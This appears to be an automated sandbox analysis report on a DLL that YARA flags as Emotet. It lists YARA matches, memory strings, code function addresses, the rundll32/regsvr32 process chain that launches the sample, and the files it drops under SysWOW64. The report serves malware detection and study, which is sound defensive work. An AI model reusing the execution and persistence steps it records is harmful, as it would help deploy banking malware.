                      Source: svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000013.00000003.797831487.000002EBAEF82000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000013.00000003.800383001.000002EBAEF79000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                      Source: svchost.exe, 00000013.00000003.800332710.000002EBAEFA1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800427811.000002EBAF402000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800351036.000002EBAEFA1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800401036.000002EBAEF8A000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.800383001.000002EBAEF79000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001280 recvfrom,2_2_10001280
                      Source: loaddll32.exe, 00000000.00000000.678773988.000000000111B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_10027958
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_10027958
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_10027958

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.59f0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5630000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4720000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5690000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.53f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56c0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ae0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5500000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5660000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.53f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59f0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3600000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4780000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.54d0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a20000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2ab0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ae0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4750000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4720000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5690000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5630000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.2ab0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.54d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.11f0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4780000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.680031217.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.687070469.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.684992268.0000000003450000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.703964616.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687871792.0000000005661000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687254093.0000000005501000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686420197.00000000053F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688080295.0000000005690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.687539122.0000000005630000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670630923.0000000001270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679124499.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717791244.00000000047B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.687321793.0000000000B81000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717740715.0000000004780000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679046535.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670153557.0000000000C61000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.670105180.0000000000980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.679999425.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688465307.00000000059F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716834900.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688659098.0000000005A21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670654175.00000000012A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716329937.0000000000B21000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.688152191.00000000056C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717660130.0000000004720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.715971380.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686930115.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.716952958.00000000011F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.717702240.0000000004751000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.685377727.0000000003601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.686624450.0000000005421000.00000020.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ytghf\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFEFDD0_2_02AFEFDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF3EAA0_2_02AF3EAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEBAA90_2_02AEBAA9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFA2A50_2_02AFA2A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B046BD0_2_02B046BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE1CA10_2_02AE1CA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF0EBC0_2_02AF0EBC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF0ABA0_2_02AF0ABA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEC6B80_2_02AEC6B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B036AA0_2_02B036AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEF0E90_2_02AEF0E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFE4E50_2_02AFE4E5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFBEFD0_2_02AFBEFD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B03EE90_2_02B03EE9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B000EF0_2_02B000EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE80C00_2_02AE80C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFD8DB0_2_02AFD8DB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFCCD90_2_02AFCCD9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFCAD50_2_02AFCAD5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEB8200_2_02AEB820
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE86360_2_02AE8636
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE34310_2_02AE3431
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF7A0F0_2_02AF7A0F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF88060_2_02AF8806
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF9A010_2_02AF9A01
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B020090_2_02B02009
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF4A660_2_02AF4A66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B032630_2_02B03263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B00A640_2_02B00A64
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF567B0_2_02AF567B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE70780_2_02AE7078
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE7E790_2_02AE7E79
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEDE740_2_02AEDE74
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFA4740_2_02AFA474
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFDC710_2_02AFDC71
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEA8710_2_02AEA871
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEA4450_2_02AEA445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF42440_2_02AF4244
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE74420_2_02AE7442
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEE6400_2_02AEE640
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFF8400_2_02AFF840
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF2E5D0_2_02AF2E5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFB2570_2_02AFB257
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF8FAE0_2_02AF8FAE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B017BD0_2_02B017BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE77A30_2_02AE77A3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEBFBE0_2_02AEBFBE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFD1BC0_2_02AFD1BC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE57B80_2_02AE57B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B007AA0_2_02B007AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEFB8E0_2_02AEFB8E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE238C0_2_02AE238C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF61870_2_02AF6187
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF0F860_2_02AF0F86
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF3D850_2_02AF3D85
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE21940_2_02AE2194
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF67E60_2_02AF67E6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF85FF0_2_02AF85FF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE55FF0_2_02AE55FF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE4BFC0_2_02AE4BFC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF27F90_2_02AF27F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFE1F80_2_02AFE1F8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF9DF50_2_02AF9DF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF07F40_2_02AF07F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEE7DE0_2_02AEE7DE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFFBDE0_2_02AFFBDE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEC5D80_2_02AEC5D8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFC5D50_2_02AFC5D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF8D3D0_2_02AF8D3D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE1F380_2_02AE1F38
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF53330_2_02AF5333
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEEF0C0_2_02AEEF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE670B0_2_02AE670B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFAD080_2_02AFAD08
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B02B090_2_02B02B09
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF55150_2_02AF5515
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AEF3690_2_02AEF369
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AE6B7A0_2_02AE6B7A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF017B0_2_02AF017B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF437A0_2_02AF437A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF57790_2_02AF5779
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF4F740_2_02AF4F74
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF97740_2_02AF9774
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AED14C0_2_02AED14C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02B02D530_2_02B02D53
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF654A0_2_02AF654A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF21420_2_02AF2142
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AF7D5B0_2_02AF7D5B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFFF580_2_02AFFF58
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02AFE9550_2_02AFE955
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100291F62_2_100291F6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002F3782_2_1002F378
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100403D72_2_100403D7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1004250B2_2_1004250B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100415572_2_10041557
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100395A12_2_100395A1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002F7842_2_1002F784
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1004091B2_2_1004091B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002EACF2_2_1002EACF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FBA42_2_1002FBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100291F63_2_100291F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3783_2_1002F378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100403D73_2_100403D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004250B3_2_1004250B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100415573_2_10041557
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100395A13_2_100395A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F7843_2_1002F784
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004091B3_2_1004091B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002EACF3_2_1002EACF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FBA43_2_1002FBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10035D963_2_10035D96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10040E5F3_2_10040E5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002EFA43_2_1002EFA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100291F64_2_100291F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002F3784_2_1002F378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100403D74_2_100403D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1004250B4_2_1004250B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100415574_2_10041557
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100395A14_2_100395A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002F7844_2_1002F784
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1004091B4_2_1004091B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002EACF4_2_1002EACF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002FBA44_2_1002FBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10035D964_2_10035D96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10040E5F4_2_10040E5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002EFA44_2_1002EFA4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030E38 appears 49 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030535 appears 75 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030E38 appears 116 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003578B appears 46 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030535 appears 174 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030568 appears 32 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: YBfn5E3Dlw.dllVirustotal: Detection: 13%
                      Source: YBfn5E3Dlw.dllReversingLabs: Detection: 16%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\YBfn5E3Dlw.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\YBfn5E3Dlw.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja",rArKTBwXKBsr
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 552
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dfktehrjwgeevy\pakqi.bja",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\YBfn5E3Dlw.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\YBfn5E3Dlw.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dfktehrjwgeevy\pakqi.bja",rArKTBwXKBsrJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6260 -ip 6260Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 552Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dfktehrjwgeevy\pakqi.bja",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF761.tmpJump to behavior
                      Source: classification engineClassification label: mal92.troj.evad.winDLL@26/10@0/28
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\YBfn5E3Dlw.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5628:64:WilError_01
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10021183 LoadResource,LockResource,SizeofResource,2_2_10021183
